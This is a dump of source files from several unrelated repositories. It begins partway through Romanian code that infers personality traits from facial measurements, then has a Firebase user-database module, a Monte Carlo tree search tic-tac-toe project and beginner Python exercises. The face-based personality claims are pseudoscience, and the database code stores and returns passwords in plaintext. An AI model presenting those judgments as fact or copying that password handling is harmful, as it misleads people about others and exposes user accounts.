prieteni apropiati, prefrand sa mentina o anumita distanta fata de oameni.\\n\\n\"\n\n if (distanta_sprancene - 23) == 0:\n text = text + \"Persoana este foarte sensibila de critici, se supara repede si traiesc cu impresia ca cineva le doreste raul.\\nIn general, se vad navoiti sa depuna un efort dublu pentru a obtine acelasi succes precum o persoana care nu are sprancenele unite. De asemenea, sunt introvertiti si timizi.\\n\\n\"\n else:\n if distanta_sprancene - 23 > distanta_intre_ochi:\n text = text + \"Peroana este intelegatoare, rabdatoare si are inima plina de compasiune.\\nSe face cu usurinta iubita si acceptata de cei din jurul ei deoarece are un caracter placut. E generoasa, loiala si un foarte bun prieten.\\n\\n\"\n else:\n text = text + \"Persoana are o putere foarte mare de concentrare, atentie la detalii, precisa si da dovada de acuratete.\\nCel mai bine pentru ea ese sa aiba mai multe independenta la locul de munca sau sa inceapa o afacer pe cont propriu.\\n\\n\"\n\n if int(dicti['pupil_right'].x) < int(dicti['mouth_right'].x + 10):\n text = text + \"Persoana este introvertita, centrata pe ea insasi, su o vointa puternuca si sceptica, nu se imprieteneste usor cu oricine, e practica,\\ncumpatata mental si lupta cu hotarare pentru succes ori pentru a-si atinge scopul. Critica lumea si detesta falsitatea.\\n\\n\"\n else: text = text + \"Persoana este curajoasa, energica, are nevoie sa fie in centrul atentiei si este lipsita de timiditatee. Poate ajunge un om influent sau afacerist de succes.\\nInspira incredere si iubeste sa traiasca viata intens. 
Rade mult, socializeaza cu placere si se imprietenesc usor.\\n\\n\"\n\n # print(lungimea_gurii)\n # print(marimea_nas*(-3)+40)\n if (marimea_nas*(-3) + 40) > lungimea_gurii:\n text = text + \"Persoana are o parere buna desprea ea insasi si este independenta, este foarte ambitioasa, ii place sa actioneze dupa bunul plac si este un lider bun.\\n\\n\"\n else: text = text + \"Persoana are putin incredere in ea insasi, evita activitatile care presupun pozitii sociale inalte si opteaza pentru cele care presupun munca in echipa.\\n\\n\"\n\n return text\n\n # dicti1 = {\n # 'distanta_intre_pupile' : distanta_intre_pupile,\n # 'aria' : arie,\n # 'marimea_ochi_latura_a' : marimea_ochi_latura_a,\n # 'marimea_ochi_latura_b': marimea_ochi_latura_b,\n # 'lungimea_gurii' : lungimea_gurii,\n # 'lungimea_sprancenelor_stanga': lungimea_sprancenelor_stanga,\n # 'lungimea_sprancenelor_dreapta' : lungimea_sprancenelor_dreapta\n # }\n # return dicti, dicti1"
},
{
"alpha_fraction": 0.6377879977226257,
"alphanum_fraction": 0.6420890688896179,
"avg_line_length": 27.04310417175293,
"blob_id": "7a00714ba70bc873b153bbb31f697065df88fead",
"content_id": "ea1a767a288fa11262a7a27939d4eff3223d4453",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3255,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 116,
"path": "/Database/DB_CodeUsers.py",
"repo_name": "HarangusPaul/Bool-s",
"src_encoding": "UTF-8",
"text": "import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\n\ncred = credentials.Certificate('D:/Scoala/Bool-s/Database/bools-db-firebase-adminsdk-tsrw7-9299478109.json')\n\nfirebase_admin.initialize_app(cred)\ndb = firestore.client()\n\n\ndef create_Questionnaire(IdUser, Question, Answer):\n doc_ref_User = db.collection(\"Users\").document(IdUser).collection(\"Questionnaire\").document(IdUser)\n\n doc_ref_User.set({\n u'Text': Question,\n u\"Answer\": Answer\n })\n\n\ndef create_UsersPassions(IdUser, IdPassion):\n doc_ref_User = db.collection(\"Users\").document(IdUser).collection(\"UserPassions\").document(IdUser)\n\n doc_ref_User.set({\n # u\"IdUser\": IdUser,\n u\"IdPassion\": IdPassion\n })\n\n\ndef create_FacialRecognition(IdUser, Description, DistanceValue):\n doc_ref_User = db.collection(\"Users\").document(IdUser).collection(\"FacialRecognition\").document(IdUser)\n\n doc_ref_User.set({\n # u\"IdUser\": IdUser,\n u\"Description\": Description,\n u\"FacialValue\": DistanceValue\n })\n\n\ndef create_NewUser(IdUser, Full_Name, Age,Gender,Password, Gmail, IdQuestion, IdAnswer, IdPassion, IdFacePart, DistanceValue):\n doc_ref_User = db.collection(\"Users\").document(IdUser)\n\n doc_ref_User.set({\n # u\"ID\": IdUser,\n u'UserName':IdUser,\n u'Full_Name': Full_Name,\n u'Password': Password,\n u'Gender': Gender,\n u\"Age\": Age,\n u\"Gmail\": Gmail\n })\n\n create_Questionnaire(IdUser, IdQuestion, IdAnswer)\n\n create_UsersPassions(IdUser, IdPassion)\n\n create_FacialRecognition(IdUser, IdFacePart, DistanceValue)\n\n\ndef update(IdUser, Field, Value, SubColection):\n if (SubColection != '\\0'):\n doc_ref_User = db.collection(\"Users\").document(IdUser).collection(SubColection).document(IdUser)\n\n doc_ref_User.update({\n Field: Value\n })\n else:\n doc_ref_User = db.collection(\"Users\").document(IdUser)\n doc_ref_User.update({\n Field: Value\n })\n\ndef database_GetPassword(UserName):\n emp_ref = db.collection('Users')\n docs = emp_ref.stream()\n\n for doc in docs:\n user = doc.to_dict()\n username = str(user.get('UserName'))\n if username == UserName:\n password = user.get('Password')\n return password\n\ndef validate_existence(UserName):\n emp_ref = db.collection('Users')\n docs = emp_ref.stream()\n\n for doc in docs:\n user = doc.to_dict()\n username = str(user.get('UserName'))\n if username == str(UserName):\n return 1\n return 0\n\ndef send_Text_Answer(IdUser,Text):\n doc_ref_User = db.collection(\"Users\").document(IdUser).collection(\"Questionnaire\").document(IdUser)\n\n doc_ref_User.update({\n \"IdAnswer\": Text\n })\n\ndef send_Facial_Answer(IdUser,Text):\n doc_ref_User = db.collection(\"Users\").document(IdUser).collection(\"FacialRecognition\").document(IdUser)\n\n doc_ref_User.update({\n \"FacialValue\": Text\n })\n\ndef database(Username):\n emp_ref = db.collection('Users')\n docs = emp_ref.stream()\n\n for doc in docs:\n user = doc.to_dict()\n username = str(user.get('UserName'))\n if username == Username:\n return user\n\n\n"
},
{
"alpha_fraction": 0.8260869383811951,
"alphanum_fraction": 0.8260869383811951,
"avg_line_length": 14.666666984558105,
"blob_id": "0cbdeb94d814f443e76c7ecd51a0dfc8f0bdb5b5",
"content_id": "dc575f8ff54dc4f696c52cb8aa8c32f23a8fa0a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 3,
"path": "/Aplication Name.py",
"repo_name": "HarangusPaul/Bool-s",
"src_encoding": "UTF-8",
"text": "from Interfata.LogInCode import start\n\nstart()"
}
] | 7 |
Ganariya/MonteCarloTreeSearch | https://github.com/Ganariya/MonteCarloTreeSearch | 1b07ebaf71968f33b9160e12d5b358e44e66abbf | af8216429217e4bb84203e7adf3d2c717f31dac3 | c6ac41b1fb3d1e6e22790430ad529b5a4b8069fd | refs/heads/main | 2023-05-09T10:58:27.683709 | 2021-05-16T03:28:28 | 2021-05-16T03:28:28 | 367,775,797 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5487571954727173,
"alphanum_fraction": 0.5587953925132751,
"avg_line_length": 31.6875,
"blob_id": "45e506599aec1a9c80ced6e43a9efcf632a6d1a0",
"content_id": "a0a08a40239c749c38a1333d5a8a60bc54e68afb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2320,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 64,
"path": "/monte_carlo_tree_search/node.py",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations\nfrom typing import List, Optional\nfrom monte_carlo_tree_search.istate import IState\nfrom monte_carlo_tree_search.util.ucb1 import ucb1\nfrom monte_carlo_tree_search.util.argmax import argmax\n\n\nclass Node:\n def __init__(self, state: IState, expand_base: int = 10) -> None:\n self.state: IState = state\n self.w: int = 0 # 報酬\n self.n: int = 0 # 訪問回数\n self.expand_base: int = expand_base\n self.children: Optional[List[Node]] = None\n\n def evaluate(self) -> float:\n \"\"\"self (current Node) の評価値を計算して更新する.\"\"\"\n if self.state.is_done():\n value = -1 if self.state.is_lose() else 0\n self.w += value\n self.n += 1\n return value\n\n # self (current Node) に子ノードがない場合\n if not self.children:\n # ランダムにプレイする\n v = Node.playout(self.state)\n self.w += v\n self.n += 1\n # 十分に self (current Node) がプレイされたら展開(1ノード掘り進める)する\n if self.n == self.expand_base:\n self.expand()\n return v\n else:\n v = -self.next_child_based_ucb().evaluate()\n self.w += v\n self.n += 1\n return v\n\n def expand(self) -> None:\n \"\"\"self (current Node) を展開する.\"\"\"\n self.children = [Node(self.state.next(action), self.expand_base) for action in self.state.legal_actions()]\n\n def next_child_based_ucb(self) -> Node:\n \"\"\"self (current Node) の子ノードから1ノード選択する.\"\"\"\n\n # 試行回数が0のノードを優先的に選ぶ\n for child in self.children:\n if child.n == 0:\n return child\n\n # UCB1\n sn = sum([child.n for child in self.children])\n ucb1_values = [ucb1(sn, child.n, child.w) for child in self.children]\n return self.children[argmax(ucb1_values)]\n\n @classmethod\n def playout(cls, state: IState) -> float:\n \"\"\"決着がつくまでランダムにプレイする.\"\"\"\n if state.is_lose():\n return -1\n if state.is_draw():\n return 0\n return -Node.playout(state.next(state.random_action()))\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.7368420958518982,
"avg_line_length": 37,
"blob_id": "f0e7d340a8faa2e81c8b6f2de3f37ac62541a90a",
"content_id": "7aa63f30d7a406051b2f4b8323b2a103b3f486c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 76,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 2,
"path": "/monte_carlo_tree_search/util/argmax.py",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "def argmax(collection) -> int:\n return collection.index(max(collection))\n"
},
{
"alpha_fraction": 0.6697247624397278,
"alphanum_fraction": 0.6697247624397278,
"avg_line_length": 31.058822631835938,
"blob_id": "1876f190c50c57325c4f455f0f1dc03abd164ca5",
"content_id": "ce000cc0c59a02d0d1c0bc53089e9583fab4c71c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 545,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 17,
"path": "/monte_carlo_tree_search/monte_carlo_tree_search.py",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "from monte_carlo_tree_search.node import Node\nfrom monte_carlo_tree_search.util.argmax import argmax\n\n\nclass MonteCarloTreeSearch:\n\n @classmethod\n def train(cls, root_node: Node, simulation: int) -> None:\n root_node.expand()\n for _ in range(simulation):\n root_node.evaluate()\n\n @classmethod\n def select_action(cls, root_node: Node) -> int:\n legal_actions = root_node.state.legal_actions()\n visit_list = [child.n for child in root_node.children]\n return legal_actions[argmax(visit_list)]\n"
},
{
"alpha_fraction": 0.48808127641677856,
"alphanum_fraction": 0.49824151396751404,
"avg_line_length": 33.119998931884766,
"blob_id": "2fe7a236829b03131a231b95a9b6e4dd7031c200",
"content_id": "59d644f4f2be17f07395cd4396105a8c3796ee0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2559,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 75,
"path": "/tic_tac_toe/state.py",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations\nfrom random import choice\nfrom monte_carlo_tree_search.istate import IState\nfrom typing import List, Optional, Final\n\nLENGTH: Final[int] = 3\nHEIGHT: Final[int] = 3\nWIDTH: Final[int] = 3\n\n\nclass State(IState):\n def __init__(self, pieces: Optional[List[int]] = None, enemy_pieces: Optional[List[int]] = None):\n self.pieces: Optional[List[int]] = pieces if pieces is not None else [0] * (HEIGHT * WIDTH)\n self.enemy_pieces: Optional[List[int]] = enemy_pieces if enemy_pieces is not None else [0] * (HEIGHT * WIDTH)\n\n def next(self, action: int) -> State:\n pieces = self.pieces.copy()\n pieces[action] = 1\n return State(self.enemy_pieces, pieces)\n\n def legal_actions(self) -> List[int]:\n return [i for i in range(HEIGHT * WIDTH) if self.pieces[i] == 0 and self.enemy_pieces[i] == 0]\n\n def random_action(self) -> int:\n return choice(self.legal_actions())\n\n @staticmethod\n def pieces_count(pieces: List[int]) -> int:\n return pieces.count(1)\n\n def is_lose(self) -> bool:\n dy = [0, 1, 1, -1]\n dx = [1, 0, 1, -1]\n\n for y in range(HEIGHT):\n for x in range(WIDTH):\n for k in range(4):\n lose = True\n ny, nx = y, x\n for i in range(LENGTH):\n if ny < 0 or ny >= HEIGHT or nx < 0 or nx >= WIDTH:\n lose = False\n break\n if self.enemy_pieces[ny * WIDTH + nx] == 0:\n lose = False\n break\n ny += dy[k]\n nx += dx[k]\n if lose:\n return True\n\n return False\n\n def is_draw(self) -> bool:\n return self.pieces_count(self.pieces) + self.pieces_count(self.enemy_pieces) == HEIGHT * WIDTH\n\n def is_done(self) -> bool:\n return self.is_lose() or self.is_draw()\n\n def is_first_player(self) -> bool:\n return self.pieces_count(self.pieces) == self.pieces_count(self.enemy_pieces)\n\n def __str__(self) -> str:\n ox = ('o', 'x') if self.is_first_player() else ('x', 'o')\n ret = \"\"\n for i in range(HEIGHT * WIDTH):\n if self.pieces[i] == 1:\n ret += ox[0]\n elif self.enemy_pieces[i] == 1:\n ret += ox[1]\n else:\n ret += '-'\n if i % WIDTH == WIDTH - 1:\n ret += '\\n'\n return ret\n"
},
{
"alpha_fraction": 0.7653061151504517,
"alphanum_fraction": 0.7908163070678711,
"avg_line_length": 18.399999618530273,
"blob_id": "06f2e52ff774570a1d7b7abf48fbe03e5e207b61",
"content_id": "b230ea6aa2320ac91bdfad76af3841290db58a1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 374,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 10,
"path": "/README.md",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "\n# MonteCarloTreeSearch\n\n[AlphaZero 深層学習・強化学習・探索 人工知能プログラミング実践入門](https://www.borndigital.co.jp/book/14383.html)\n\n以上の本を参考に、モンテカルロ木探索をセルフ実装しています。\nいくつか異なる点があります。\n\n- 冗長なコードを改善\n- typing による型付け\n- 抽象化\n\n"
},
{
"alpha_fraction": 0.4909090995788574,
"alphanum_fraction": 0.5272727012634277,
"avg_line_length": 21,
"blob_id": "b36661d73d5a36c1125721c4bfd967646177e7a4",
"content_id": "77d1b176f928834c6b52071cc11c76617cf77e55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 110,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 5,
"path": "/monte_carlo_tree_search/util/ucb1.py",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "import math\n\n\ndef ucb1(sn: int, n: int, w: float) -> float:\n return -w / n + (2 * math.log(sn) / n) ** 0.5\n"
},
{
"alpha_fraction": 0.5661016702651978,
"alphanum_fraction": 0.5805084705352783,
"avg_line_length": 25.22222137451172,
"blob_id": "7bd275643f3e2106be025d7b73924ace7e73e6ce",
"content_id": "11fa9c12d53674c3b2363d632ec72887d7df2e67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1232,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 45,
"path": "/tic_tac_toe/play_tic_tac_toe.py",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "from tic_tac_toe.state import State\nfrom monte_carlo_tree_search.node import Node\nfrom monte_carlo_tree_search.monte_carlo_tree_search import MonteCarloTreeSearch\n\n\nGAMES = 100\n\n\ndef first_player_point(ended_state: State) -> float:\n # 1:先手勝利, 0:先手敗北, 0.5:引き分け\n if ended_state.is_lose():\n return 0 if ended_state.is_first_player() else 1\n return 0.5\n\n\npoint = 0\n\nfor _ in range(GAMES):\n state = State()\n while True:\n if state.is_done():\n if state.is_draw():\n print(\"引き分け\")\n elif state.is_first_player() and state.is_lose():\n print(\"先手 (o) の負け \")\n else:\n print(\"後手 (x) の負け \")\n break\n\n if state.is_first_player():\n root_node: Node = Node(state, expand_base=10)\n MonteCarloTreeSearch.train(root_node=root_node, simulation=100)\n action = MonteCarloTreeSearch.select_action(root_node)\n state = state.next(action)\n else:\n action = state.random_action()\n state = state.next(action)\n\n print(state)\n print()\n\n point += first_player_point(state)\n\n\nprint(f\"VS Random {point}\")\n"
},
{
"alpha_fraction": 0.6029654145240784,
"alphanum_fraction": 0.6029654145240784,
"avg_line_length": 17.363636016845703,
"blob_id": "5e01801cc87e2ffd683ded0104379b1ea305fa8b",
"content_id": "3c45c476f5edb8616f83270f194796e46db6c259",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 607,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 33,
"path": "/monte_carlo_tree_search/istate.py",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations\nfrom abc import ABC, abstractmethod\nfrom typing import List\n\n\nclass IState(ABC):\n @abstractmethod\n def legal_actions(self) -> List[int]:\n pass\n\n @abstractmethod\n def random_action(self) -> int:\n pass\n\n @abstractmethod\n def next(self, action: int) -> IState:\n pass\n\n @abstractmethod\n def is_lose(self) -> bool:\n pass\n\n @abstractmethod\n def is_draw(self) -> bool:\n pass\n\n @abstractmethod\n def is_done(self) -> bool:\n pass\n\n @abstractmethod\n def is_first_player(self) -> bool:\n pass\n\n"
}
] | 8 |
SWI-MIN/Python_practice | https://github.com/SWI-MIN/Python_practice | fd6524e0a6eb1c841145a81dc822f87026730f82 | 4da31be21823e9d6e392e823bd0fc38b9713b517 | 46d6bc28b43c3761009fe0c29c3309931ca26496 | refs/heads/master | 2022-12-19T14:01:52.564019 | 2020-09-29T14:24:03 | 2020-09-29T14:24:03 | 286,469,717 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5435114502906799,
"alphanum_fraction": 0.6068702340126038,
"avg_line_length": 33.47368240356445,
"blob_id": "b69363b0db33792749a9d5f10be1b64ace9084b7",
"content_id": "16312e9b3057e39fec816f64538859f70da6f608",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1326,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 38,
"path": "/自學聖經/user介面.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\ndef kwhp():\n if(kwhpin.get() != 0):\n kwtohp = kwhpin.get() * 1.34102209\n kwtohpans.set(str(kwhpin.get()) + ' kw = ' + str(round(kwtohp,2)) + ' hp')\n else:\n pass\n if(hpkwin.get() != 0):\n hptokw = hpkwin.get() * 0.745699872\n hptokwans.set(str(hpkwin.get()) + ' hp = ' + str(round(hptokw,2)) + ' kw')\n else:\n pass\n\nswim = tk.Tk()\nkwhpin = tk.DoubleVar()\nkwtohpans = tk.DoubleVar()\nhpkwin = tk.DoubleVar()\nhptokwans = tk.DoubleVar()\n\nswim.geometry('720x480')\nswim.title('KW to HP & HP to KW')\n# while(True):\ntext1 = tk.Label(swim, text = 'KW to HP', padx = 30, pady = 10, font = 30)#, width =30, height = 10, bg = 'grey', fg = 'black', font = ('標楷體',12))\ntext1.pack()\nentry1 = tk.Entry(swim, textvariable = kwhpin, font = 30)\nentry1.pack()\nans1 = tk.Label(swim, textvariable = kwtohpans, font = 30)\nans1.pack(pady = 10)\ntext2 = tk.Label(swim, text = 'HP to KW', padx = 30, pady = 10, font = 30)#, width =30, height = 10, bg = 'grey', fg = 'black', font = ('標楷體',12))\ntext2.pack()\nentry2 = tk.Entry(swim, textvariable = hpkwin, font = 30)\nentry2.pack()\nans2 = tk.Label(swim, textvariable = hptokwans, font = 30)\nans2.pack(pady = 10)\nbutton1 = tk.Button(swim, text = '確認', command = kwhp, font = 30)\nbutton1.pack(pady = 10)\n\nswim.mainloop()\n"
},
{
"alpha_fraction": 0.3976455330848694,
"alphanum_fraction": 0.5323740839958191,
"avg_line_length": 23.532258987426758,
"blob_id": "c9ee3dc00baf21a2676323a9a2b8cb03e0727f28",
"content_id": "0a135a47b3dc5daf79f1375e5ba8c5c8d4dc4444",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1875,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 62,
"path": "/自學聖經/03_迴圈、串列與元組.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "# coding=UTF-8\n#---------- list ----------\nlist1 = [1,2,3,4,5,6]\nprint(list1[-1]) # 串列取值可以為負值(-1取出最後一個(5))\n\n# append (附加),extend(延伸),insert(插入),pop(拋出)\n# append 可以是元素也可以是串列,append 會將串列當成一個元素加入list\nlist2 = [1,2,3,4,5,6]\nlist1.append(7) #list2 = [1,2,3,4,5,6,7]\nlist1.append([8,9]) #list2 = [1,2,3,4,5,6,7,[8,9]]\n# extend 只能是串列\nlist3 = [1,2,3,4,5,6]\nlist3.extend([8,9]) #list3 = [1,2,3,4,5,6,8,9]\n# insert 指定串列新增位置,索引超過串列大小放最後\nlist4 = [1,2,3,4,5,6]\nlist4.insert(1,55) # [1, 55, 2, 3, 4, 5, 6]\n[1, [10, 11], 55, 2, 3, 4, 5, 6]\nlist4.insert(1,[10,11]) # [1, [10, 11], 55, 2, 3, 4, 5, 6]\n# pop 無參數,取出最後一個。有參數,取出指定元素\nlist5 = [1,2,3,4,5,6]\nlist5.pop() # [1, 2, 3, 4, 5]\nlist5.pop(1) # [1, 3, 4, 5]\n\n#---------- tuple函式 ----------\n# tuple元組,結構與list相同,但其不能修改(不能修改的list)\n# 優點 : 比list快。 資料較為安全(不能更改)\n\n# list 與 tuple 轉換\ntuple11 = (1,2,3,4,5,6)\nlist11 = list(tuple11)\n\nlist12 = [1,2,3,4,5,6]\ntuple12 = tuple(list12)\n\n\n#---------- range函式 ----------\nra = range(5) # 0~4\nprint(list(ra))\n# 變數 = range(起始值, 終止值)\nrb = range(3,8) \nprint(list(rb)) # 3~7 包含頭不含尾\n# 變數 = range(起始值, 終止值, 間隔值) 間隔值可為負\nrb1 = range(3,8,2)\nprint(list(rb1)) # [3, 5, 7]\nrb2 = range(8,3,-2)\nprint(list(rb2)) # [8, 6, 4]\n\n# python 的for 更像是foreach\nfor i in range(1,10):\n for j in range(1,10):\n ans = i * j\n print('%2dx%2d = %-2d '%(i, j, ans), end='')\n print()\nwh1 = 1\nwhile(wh1 < 10):\n wh2 = 1\n while(wh2 < 10):\n whans = wh1 * wh2\n print('%2dx%2d = %-2d '%(wh1, wh2, whans), end='')\n wh2+=1\n print() \n wh1+=1\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.704081654548645,
"avg_line_length": 13.142857551574707,
"blob_id": "3f9182f6d7ba0f3175889c22230b14815474a50d",
"content_id": "1e8c747eb6bc62aeb61fdf5c01b73fe6ddc06478",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 98,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 7,
"path": "/自學聖經/09_使用者介面.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\n\nswim = tk.Tk()\n\nswim.geometry('720*240')\nswim.title('TITLE')\nswim.mainloop()"
},
{
"alpha_fraction": 0.3421263098716736,
"alphanum_fraction": 0.36690646409988403,
"avg_line_length": 16.885713577270508,
"blob_id": "0f67c158dee11e62e3b2b2793e9ad1ff2a260b50",
"content_id": "8c5bd98b537da70c1fc8caf2bb78090ea6e27126",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1737,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 70,
"path": "/02.運算.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "###########算數運算############\n# + 加\n# - 減\n# * 乘\n# / 小數除法\n# % 取餘數除法\n# ** 次方運算\n# // 整數除法\n\nx=3//2 # 整數除法\nprint(x)\nx=3+2 # 加\nprint(x)\nx=3-2 # 減\nprint(x)\nx=3*2 # 乘\nprint(x)\nx=3/2 # 小數除法\nprint(x)\nx=3%2 # 取餘數除法\nprint(x)\nx=3**2 # 次方運算\nprint(x)\nx=3**0.5 # 開根號運算\nprint(x)\nx=3//2 # 整數除法\nprint(x)\n###########賦值運算############\n# =\t 简单賦值運算 c = a + b 将 a + b 的运算结果赋值为 c\n# +=\t 加法賦值運算\tc += a 等效于 c = c + a\n# -=\t 减法賦值運算\tc -= a 等效于 c = c - a\n# *=\t 乘法賦值運算\tc *= a 等效于 c = c * a\n# /=\t 除法賦值運算\tc /= a 等效于 c = c / a\n# %=\t 取模賦值運算 c %= a 等效于 c = c % a\n# **=\t幂賦值運算 \tc **= a 等效于 c = c ** a\n# //=\t取整除賦值運算 c //= a 等效于 c = c // a\n\n###########比較運算############\n# == 等於\n# != 不等於\n# > 大於\n# < 小於\n# >= 大於等於\n# <= 小於等於\n\n\n\n\n#############以下是字串################\n\ns='WAKAKA\\'LALA\\'WAWAWA'\nprint(s)\n# 3個單or雙引號可以直接換行\ns=\"\"\"WAKAKA\\'LA\n \n \n \n 爽啦~~就愛空這麼多行,你打我撒\n \n \n \n LA\\'WAWAWA\"\"\"\nprint(s)\ns='你打我撒~'*3 + '不打臉行不'\nprint(s)\nprint(s[1]) # 第幾個字\nprint(s[4]) # 第幾個字\nprint(s[15:19]) # 第幾個字開始第幾個字結束,包含開頭不包含結尾\nprint(s[15:]) # 只給開頭,不給結尾\nprint(s[:15]) # 只給結尾,不給開頭"
},
{
"alpha_fraction": 0.48566877841949463,
"alphanum_fraction": 0.5493630766868591,
"avg_line_length": 22.296297073364258,
"blob_id": "8e3cf66390b28bf4da12156157d2a377e12154e0",
"content_id": "8b3a021400cfd7e9abd8e2b0b9c68596e65e1d6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 834,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 27,
"path": "/03.List-Tuple.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "# List 有順序、可動列表\nnumlist=[3,4,5,6,7]\nprint(numlist) \nprint(numlist[1]) # 取表中第一個資料\nnumlist[1]=44444444 # 更新表資料\nprint(numlist)\nprint(numlist[1:4]) # 取表中第1個到第4個資料,包含頭不包含尾\nnumlist[1:4]=[] # 刪除中第1個到第4個資料,包含頭不包含尾\nprint(numlist) \nnumlist=numlist+[8,9] # 列表串接\nprint(numlist) \nnumlist+=[8,9] # 列表串接\nprint(numlist) \n\nlength=len(numlist)\nprint(length) # 取得列表長度 做法1\nprint(len(numlist)) # 取得列表長度 做法2\n\n# 二維\nnumlist=[[0,1,2],[0,1,2]]\n\n#################################################################\n\n# Tuple 有順序、不可動列表\nnumtuple=(3,4,5,6,7)\n\n# list 跟 tuple 的差別只在於tuple不可變動"
},
{
"alpha_fraction": 0.4689054787158966,
"alphanum_fraction": 0.5111940503120422,
"avg_line_length": 20.105262756347656,
"blob_id": "60436c60cab52f07dcf0d55e33a3159180b8396c",
"content_id": "c0d33e1adabf960db32c962c3f77ebc290e86f75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1002,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 38,
"path": "/04.Set-Dictionary.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "# 集合的運算\n# 變數名稱 = {值1,值2,值3}\ns1={1,2,3}\ns2={3,4,5}\nprint(3 in s1) # 3在集合裡 T or F\nprint(3 not in s1) # 3不在集合裡 T or F\n\nprint(s1 & s2) # 交集\nprint(s1 | s2) # 聯集\nprint(s1 - s2) # 差集\nprint(s1 ^ s2) # 反交集XOR 連集減交集 (s1|s2)-(s1&s2)\n\ns=set(\"你打我撒~WWWWWWWWWWWWWWWW\") # 把字串中的字母拆解成 Set,重複的只會取一個\nprint(s)\nprint('你' in s)\n\nprint('-------------------------------------')\n\n# 字典的運算\n# Dictionary 字典\n# 變數名稱 = {'鍵':'值'}\ndic={\"apple\":\"蘋果\",'DATA':'資料',\"bug\":\"蟲蟲\"}\nprint(dic)\nprint(dic['apple'])\ndic[\"apple\"]=\"小小小蘋果\" # 更新\nprint(dic['apple'])\ndic['School'] = \"FCU\" # 添加\nprint(dic)\nprint('apple' in dic)\nprint('apple' not in dic)\ndel dic['DATA']\nprint(dic)\n\nprint('-------------------------------------')\n\n# dic={x:x*2 for x in 列表} 從列表的資料產生字典\ndic={x:x*2 for x in [3,4,5]}\nprint(dic)\n\n\n"
},
{
"alpha_fraction": 0.42291128635406494,
"alphanum_fraction": 0.45908698439598083,
"avg_line_length": 20.5,
"blob_id": "91365c771a00fbc883d0b045b31a1a131b644953",
"content_id": "4038762f590795b77ab41130888591d808c7dfe0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1507,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 54,
"path": "/05.判斷_迴圈.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
